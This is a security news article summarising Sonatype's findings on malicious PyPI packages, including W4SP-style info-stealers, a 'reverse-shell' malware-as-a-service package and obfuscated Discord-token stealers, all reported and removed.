Security vendor Sonatype detected 6933 malicious open source packages in the month of March alone, bringing the total discovered since 2019 to 115,165.
Info-stealers comprised a significant number of these malicious components, including copycats of the popular W4SP stealer, such as one called “microsoft-helper” from an author self-described as “idklmao.”
“The name of the package, microsoft-helper, might be the bad actors’ attempt to disguise its malicious nature, maybe with the goal of potentially adding it as a dependency of a popular package they’ve already owned,” Sonatype explained.
“However, the author’s name, composed by abbreviations, didn’t even try to pretend it was from a legit author.”
The malicious package featured a second-stage payload which Sonatype said provides the threat actors with more flexibility, as it means they can modify code more easily without needing to start everything from scratch.
Read more on open source supply chain risk: Researchers Uncover 700+ Malicious Open Source Packages.
Unlike “microsoft-helper,” the authors of the “reverse-shell” package Sonatype found last month made no attempt to hide their intent.
It denoted a malware-as-a-service (MaaS) offering for the Spanish market, hosting malicious files on GitHub.
“Even though the package ‘reverse-shell’ doesn’t look malicious at first glance, the file that it executes from GitHub, ‘bypass.py,’ and consequently, ‘WindowsDefender.py,’ are nothing but nefarious,” the security vendor explained.
“Hosting malicious files on a public repository provides bad actors more control over them. It gives them the power of deleting, upgrading, or even doing version control of the payload.”
Finally, Sonatype highlighted two heavily obfuscated packages, “proxier-api” and “nitro-api66,” designed to steal Discord tokens.
All of the above were discovered on the Python Package Index (PyPI) repository.
“These types of packages are a cause for concern as they pose a serious threat to developers who may inadvertently download and install them,” the vendor argued. “Given the potential danger involved, we reported them to the PyPI team and they took them down promptly and proficiently.”